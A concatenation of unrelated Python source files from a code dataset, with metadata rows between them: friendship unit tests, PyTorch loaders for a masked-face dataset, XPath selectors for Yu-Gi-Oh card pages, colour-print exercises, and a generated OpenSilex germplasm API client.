self.assertEqual(len(self.other.pending_outgoing_friends), 0)
# Repeat add
friendship, created = self.profile.add_friend(self.other)
self.assertFalse(friendship.accepted)
self.assertFalse(created)
self.assertEqual(len(self.profile.friends), 0)
self.assertEqual(len(self.profile.pending_incoming_friends), 0)
self.assertEqual(len(self.profile.pending_outgoing_friends), 1)
self.assertEqual(len(self.other.friends), 0)
self.assertEqual(len(self.other.pending_incoming_friends), 1)
self.assertEqual(len(self.other.pending_outgoing_friends), 0)
# Normal accept
friendship, created = self.other.add_friend(self.profile)
self.assertTrue(friendship.accepted)
self.assertTrue(created)
self.assertEqual(len(self.profile.friends), 1)
self.assertEqual(len(self.profile.pending_incoming_friends), 0)
self.assertEqual(len(self.profile.pending_outgoing_friends), 0)
self.assertEqual(len(self.other.friends), 1)
self.assertEqual(len(self.other.pending_incoming_friends), 0)
self.assertEqual(len(self.other.pending_outgoing_friends), 0)
# Repeat accept
friendship, created = self.other.add_friend(self.profile)
self.assertTrue(friendship.accepted)
self.assertFalse(created)
self.assertEqual(len(self.profile.friends), 1)
self.assertEqual(len(self.profile.pending_incoming_friends), 0)
self.assertEqual(len(self.profile.pending_outgoing_friends), 0)
self.assertEqual(len(self.other.friends), 1)
self.assertEqual(len(self.other.pending_incoming_friends), 0)
self.assertEqual(len(self.other.pending_outgoing_friends), 0)
def test_del(self):
# Add friendship
self.profile.add_friend(self.other)
self.other.add_friend(self.profile)
self.assertEqual(len(self.profile.friends), 1)
self.assertEqual(len(self.other.friends), 1)
# Delete friendship
self.profile.del_friend(self.other)
self.assertEqual(len(self.profile.friends), 0)
self.assertEqual(len(self.other.friends), 0)
| 38.948052 | 71 | 0.7009 | 358 | 2,999 | 5.751397 | 0.117318 | 0.203983 | 0.244779 | 0.299174 | 0.843128 | 0.843128 | 0.843128 | 0.813987 | 0.802331 | 0.802331 | 0 | 0.011944 | 0.190397 | 2,999 | 76 | 72 | 39.460526 | 0.836079 | 0.027342 | 0 | 0.754717 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.679245 | 1 | 0.056604 | false | 0 | 0.056604 | 0 | 0.150943 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
e12b6b2b802d37f61cc26ca422529560e1a71075 | 8,097 | py | Python | datasets/eval/rmfd.py | agikarasugi/Face-Mask-Invariant-End-to-End-Face-Recognition | eb274ff98246c1bb8748bd8c8351d3494a87dfce | [
"MIT"
] | 1 | 2021-05-21T07:56:26.000Z | 2021-05-21T07:56:26.000Z | datasets/eval/rmfd.py | agikarasugi/Face-Mask-Invariant-End-to-End-Face-Recognition | eb274ff98246c1bb8748bd8c8351d3494a87dfce | [
"MIT"
] | null | null | null | datasets/eval/rmfd.py | agikarasugi/Face-Mask-Invariant-End-to-End-Face-Recognition | eb274ff98246c1bb8748bd8c8351d3494a87dfce | [
"MIT"
] | 1 | 2021-08-10T05:34:53.000Z | 2021-08-10T05:34:53.000Z | import os
import numpy as np
import torch
import pandas as pd
import glob
import torchvision.transforms as T
from pathlib import Path
from torch.utils.data import Dataset
from PIL import Image, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
class RMFDMaskToMask(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.data_root = os.path.join(
self.path, 'AFDB_masked_face_dataset/')
self.inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2m.csv"))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "mask-to-mask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
label = self.inference_list[i]
img_path = os.path.join(self.data_root, label)
img = self.transform(Image.open(img_path).convert("RGB"))
return img, str(label)
def __len__(self):
return len(self.inference_list)
class RMFDMaskToNonMask(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.mask_root = os.path.join(
self.path, 'AFDB_masked_face_dataset/')
self.nonmask_root = os.path.join(
self.path, 'AFDB_face_dataset/')
mask_inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2nm_mask.csv"))
mask_inference_list['path'] = self.mask_root + mask_inference_list['path'].astype(str)
nonmask_inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2nm_nonmask.csv"))
nonmask_inference_list['path'] = self.nonmask_root + nonmask_inference_list['path'].astype(str)
self.inference_list = pd.concat((mask_inference_list,
nonmask_inference_list))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "mask-to-nonmask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
img_path = self.inference_list[i]
img = self.transform(Image.open(img_path).convert("RGB"))
label = os.path.join(*Path(img_path).parts[-2:])
return img, str(label)
def __len__(self):
return len(self.inference_list)
class RMFDNonMask2NonMask(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.data_root = os.path.join(
self.path, 'AFDB_face_dataset/')
self.inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_nm2nm.csv"))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "nonmask-to-nonmask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
label = self.inference_list[i]
img_path = os.path.join(self.data_root, label)
img = self.transform(Image.open(img_path).convert("RGB"))
return img, str(label)
def __len__(self):
return len(self.inference_list)
class RMFDMaskToMaskAligned(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.data_root = os.path.join(
self.path, 'AFDB_masked_face_dataset_aligned/')
self.inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2m.csv"))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "mask-to-mask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
label = self.inference_list[i]
img_path = os.path.join(self.data_root, label)
img = self.transform(Image.open(img_path).convert("RGB"))
return img, str(label)
def __len__(self):
return len(self.inference_list)
class RMFDMaskToNonMaskAligned(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.mask_root = os.path.join(
self.path, 'AFDB_masked_face_dataset_aligned/')
self.nonmask_root = os.path.join(
self.path, 'AFDB_face_dataset_aligned/')
mask_inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2nm_mask.csv"))
mask_inference_list['path'] = self.mask_root + mask_inference_list['path'].astype(str)
nonmask_inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_m2nm_nonmask.csv"))
nonmask_inference_list['path'] = self.nonmask_root + nonmask_inference_list['path'].astype(str)
self.inference_list = pd.concat((mask_inference_list,
nonmask_inference_list))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "mask-to-nonmask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
img_path = self.inference_list[i]
img = self.transform(Image.open(img_path).convert("RGB"))
label = os.path.join(*Path(img_path).parts[-2:])
return img, str(label)
def __len__(self):
return len(self.inference_list)
class RMFDNonMask2NonMaskAligned(Dataset):
def __init__(self, data_folder, transform=None):
self.path = data_folder
self.data_root = os.path.join(
self.path, 'AFDB_face_dataset_aligned/')
self.inference_list = pd.read_csv(
os.path.join(self.path, "inference_list_nm2nm.csv"))
self.inference_list = self.inference_list.to_numpy().squeeze()
self.pairs_file = pd.read_csv(
os.path.join(self.path, "nonmask-to-nonmask_pairs.csv")).to_numpy()
if transform is None:
self.transform = T.Compose([
T.Resize((112, 112)),
T.ToTensor(),
T.Normalize(mean=[0.5,0.5,0.5], std=[0.5,0.5,0.5])
])
else:
self.transform = transform
def __getitem__(self, i):
label = self.inference_list[i]
img_path = os.path.join(self.data_root, label)
img = self.transform(Image.open(img_path).convert("RGB"))
return img, str(label)
def __len__(self):
return len(self.inference_list) | 34.900862 | 103 | 0.581203 | 1,019 | 8,097 | 4.363101 | 0.081452 | 0.157895 | 0.11471 | 0.081871 | 0.926451 | 0.926451 | 0.926451 | 0.926451 | 0.926451 | 0.926451 | 0 | 0.021075 | 0.296777 | 8,097 | 232 | 104 | 34.900862 | 0.759747 | 0 | 0 | 0.909091 | 0 | 0 | 0.075821 | 0.065201 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102273 | false | 0 | 0.051136 | 0.034091 | 0.255682 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
015477b8eb894614e2e6ade4791017fe5c52a806 | 1,663 | py | Python | DB_Parser/DB_Parser/spiders/ygo_parse_settings.py | astrok100/YuGiOh_DB_Parser | 1fe3b45360635c9bb4aeac73806e6e3aae83ff06 | [
"Apache-2.0"
] | null | null | null | DB_Parser/DB_Parser/spiders/ygo_parse_settings.py | astrok100/YuGiOh_DB_Parser | 1fe3b45360635c9bb4aeac73806e6e3aae83ff06 | [
"Apache-2.0"
] | null | null | null | DB_Parser/DB_Parser/spiders/ygo_parse_settings.py | astrok100/YuGiOh_DB_Parser | 1fe3b45360635c9bb4aeac73806e6e3aae83ff06 | [
"Apache-2.0"
] | null | null | null | monster_card_settings = {
'name': '//*[@id="broad_title"]/div/h1/text()',
'attribute': '//*[@id="details"]/tr[1]/td[1]/div/span[@class="item_box_value"]/text()',
'level_rank': '//*[@id="details"]/tr[1]/td[2]/div/span[@class="item_box_value"]/text()',
'monster_type': '//*[@id="details"]/tr[2]/td/div/text()',
'monster_card_type': '//*[@id="details"]/tr[3]/td/div/text()',
'attack': '//*[@id="details"]/tr[4]/td[1]/div/span[@class="item_box_value"]/text()',
'defence': '//*[@id="details"]/tr[4]/td[2]/div/span[@class="item_box_value"]/text()',
'card_description': '//*[@id="details"]/tr[5]/td/div/node()[not(self::div)]',
}
pendulum_card_settings = {
'name': '//*[@id="broad_title"]/div/h1/text()',
'attribute': '//*[@id="details"]/tr[1]/td[1]/div/span[@class="item_box_value"]/text()',
'level_rank': '//*[@id="details"]/tr[1]/td[2]/div/span[@class="item_box_value"]/text()',
'pendulum_scale': '//*[@id="details"]/tr[2]/td/div/text()',
'pendulum_effect': '//*[@id="details"]/tr[3]/td/div/text()',
'monster_type': '//*[@id="details"]/tr[4]/td/div/text()',
'monster_card_type': '//*[@id="details"]/tr[5]/td/div/text()',
'attack': '//*[@id="details"]/tr[6]/td[1]/div/span[@class="item_box_value"]/text()',
'defence': '//*[@id="details"]/tr[6]/td[2]/div/span[@class="item_box_value"]/text()',
'card_description': '//*[@id="details"]/tr[5]/td/div/node()[not(self::div)]',
}
magic_card_settings = {
'name': '//*[@id="broad_title"]/div/h1/text()',
'card_description': '//*[@id="details"]/tr[2]/td/div/node()[not(self::div)]',
'card_type': '//*[@id="details"]/tr[1]/td/div/text()',
}
| 51.96875 | 92 | 0.570054 | 245 | 1,663 | 3.710204 | 0.155102 | 0.178218 | 0.217822 | 0.140814 | 0.940594 | 0.910891 | 0.822882 | 0.705171 | 0.705171 | 0.587459 | 0 | 0.019066 | 0.085388 | 1,663 | 31 | 93 | 53.645161 | 0.578567 | 0 | 0 | 0.333333 | 0 | 0.407407 | 0.796152 | 0.66386 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
0180f35dedf2f2dd64e3bcf9c7c7e433db3ebeda | 243 | py | Python | Exercicios/aula011.py | Vitmambro/Python9 | d084e6fd8230b71e4dade87086a411210e131320 | [
"MIT"
] | null | null | null | Exercicios/aula011.py | Vitmambro/Python9 | d084e6fd8230b71e4dade87086a411210e131320 | [
"MIT"
] | null | null | null | Exercicios/aula011.py | Vitmambro/Python9 | d084e6fd8230b71e4dade87086a411210e131320 | [
"MIT"
] | null | null | null | print('\033[31;43mOla, mundo!\033[m')
print('\033[1;32;40mOla, mundo!\033[m')
print('\033[2;33;41mOla, mundo!\033[m')
print('\033[3;34;42mOla, mundo!\033[m')
print('\033[4;35;43mOla, mundo!\033[m')
print('\033[7;36;44mOla, mundo!\033[m')
| 20.25 | 39 | 0.63786 | 47 | 243 | 3.297872 | 0.425532 | 0.309677 | 0.348387 | 0.451613 | 0.625806 | 0.296774 | 0 | 0 | 0 | 0 | 0 | 0.287611 | 0.069959 | 243 | 11 | 40 | 22.090909 | 0.39823 | 0 | 0 | 0 | 0 | 0 | 0.747899 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
6d9d0d05876f1722b332cb4e4e5afc85b46b436d | 45,558 | py | Python | opensilexClientToolsPython/api/germplasm_api.py | OpenSILEX/opensilexClientToolsPython | 41b1e7e707670ecf1b2c06d79bdd9749945788cb | [
"RSA-MD"
] | null | null | null | opensilexClientToolsPython/api/germplasm_api.py | OpenSILEX/opensilexClientToolsPython | 41b1e7e707670ecf1b2c06d79bdd9749945788cb | [
"RSA-MD"
] | 7 | 2021-05-25T14:06:04.000Z | 2021-11-05T15:42:14.000Z | opensilexClientToolsPython/api/germplasm_api.py | OpenSILEX/opensilexClientToolsPython | 41b1e7e707670ecf1b2c06d79bdd9749945788cb | [
"RSA-MD"
] | null | null | null | # coding: utf-8
"""
OpenSilex API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: INSTANCE-SNAPSHOT
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from opensilexClientToolsPython.api_client import ApiClient
class GermplasmApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_germplasm(self, **kwargs): # noqa: E501
"""Add a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_germplasm(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param GermplasmCreationDTO body: Germplasm description
:param bool check_only: Checking only
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_germplasm_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_germplasm_with_http_info(**kwargs) # noqa: E501
return data
def create_germplasm_with_http_info(self, **kwargs): # noqa: E501
"""Add a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_germplasm_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param GermplasmCreationDTO body: Germplasm description
:param bool check_only: Checking only
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'check_only', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_germplasm" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'check_only' in params:
query_params.append(('checkOnly', params['check_only'])) # noqa: E501
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectUriResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_germplasm(self, uri, **kwargs): # noqa: E501
"""Delete a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_germplasm(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: Germplasm URI (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_germplasm_with_http_info(uri, **kwargs) # noqa: E501
else:
(data) = self.delete_germplasm_with_http_info(uri, **kwargs) # noqa: E501
return data
def delete_germplasm_with_http_info(self, uri, **kwargs): # noqa: E501
"""Delete a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_germplasm_with_http_info(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: Germplasm URI (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uri', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_germplasm" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'uri' is set
if ('uri' not in params or
params['uri'] is None):
raise ValueError("Missing the required parameter `uri` when calling `delete_germplasm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uri' in params:
path_params['uri'] = params['uri'] # noqa: E501
query_params = []
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/{uri}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def export_germplasm(self, **kwargs): # noqa: E501
"""export germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_germplasm(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param str uri: Regex pattern for filtering list by uri
:param str rdf_type: Search by type
:param str name: Regex pattern for filtering list by name and synonyms
:param str code: Regex pattern for filtering list by code
:param int production_year: Search by productionYear
:param str species: Search by species
:param str variety: Search by variety
:param str accession: Search by accession
:param str institute: Search by institute
:param str experiment: Search by experiment
:param str metadata: Search by metadata
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.export_germplasm_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.export_germplasm_with_http_info(**kwargs) # noqa: E501
return data
def export_germplasm_with_http_info(self, **kwargs): # noqa: E501
"""export germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_germplasm_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param str uri: Regex pattern for filtering list by uri
:param str rdf_type: Search by type
:param str name: Regex pattern for filtering list by name and synonyms
:param str code: Regex pattern for filtering list by code
:param int production_year: Search by productionYear
:param str species: Search by species
:param str variety: Search by variety
:param str accession: Search by accession
:param str institute: Search by institute
:param str experiment: Search by experiment
:param str metadata: Search by metadata
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uri', 'rdf_type', 'name', 'code', 'production_year', 'species', 'variety', 'accession', 'institute', 'experiment', 'metadata', 'order_by', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method export_germplasm" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'uri' in params:
query_params.append(('uri', params['uri'])) # noqa: E501
if 'rdf_type' in params:
query_params.append(('rdf_type', params['rdf_type'])) # noqa: E501
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'code' in params:
query_params.append(('code', params['code'])) # noqa: E501
if 'production_year' in params:
query_params.append(('production_year', params['production_year'])) # noqa: E501
if 'species' in params:
query_params.append(('species', params['species'])) # noqa: E501
if 'variety' in params:
query_params.append(('variety', params['variety'])) # noqa: E501
if 'accession' in params:
query_params.append(('accession', params['accession'])) # noqa: E501
if 'institute' in params:
query_params.append(('institute', params['institute'])) # noqa: E501
if 'experiment' in params:
query_params.append(('experiment', params['experiment'])) # noqa: E501
if 'metadata' in params:
query_params.append(('metadata', params['metadata'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
collection_formats['order_by'] = 'multi' # noqa: E501
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/export', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def export_germplasm_by_ur_is(self, **kwargs): # noqa: E501
"""export germplasm by list of uris # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_germplasm_by_ur_is(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param URIsListPostDTO body: List of germplasm URI
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.export_germplasm_by_ur_is_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.export_germplasm_by_ur_is_with_http_info(**kwargs) # noqa: E501
return data
def export_germplasm_by_ur_is_with_http_info(self, **kwargs): # noqa: E501
"""export germplasm by list of uris # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_germplasm_by_ur_is_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param URIsListPostDTO body: List of germplasm URI
:param str accept_language: Request accepted language
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method export_germplasm_by_ur_is" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/export_by_uris', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_germplasm(self, uri, **kwargs): # noqa: E501
"""Get a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasm(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: germplasm URI (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: GermplasmGetSingleDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_germplasm_with_http_info(uri, **kwargs) # noqa: E501
else:
(data) = self.get_germplasm_with_http_info(uri, **kwargs) # noqa: E501
return data
def get_germplasm_with_http_info(self, uri, **kwargs): # noqa: E501
"""Get a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasm_with_http_info(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: germplasm URI (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: GermplasmGetSingleDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uri', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_germplasm" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'uri' is set
if ('uri' not in params or
params['uri'] is None):
raise ValueError("Missing the required parameter `uri` when calling `get_germplasm`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uri' in params:
path_params['uri'] = params['uri'] # noqa: E501
query_params = []
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/{uri}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GermplasmGetSingleDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
